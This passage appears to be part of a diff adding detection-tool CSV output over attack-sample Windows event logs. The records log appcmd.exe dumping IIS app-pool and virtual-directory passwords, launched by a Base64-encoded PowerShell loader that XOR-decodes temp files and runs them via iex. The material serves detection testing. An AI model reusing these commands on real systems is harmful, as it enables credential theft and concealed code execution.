AMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.522 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.662 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.username  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.742 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list apppool "". )"" /text:processmodel.password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.822 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:vdir.name  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.893 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
+2019-05-27 10:29:18.973 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""ERROR ( message:Configuration error "" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlA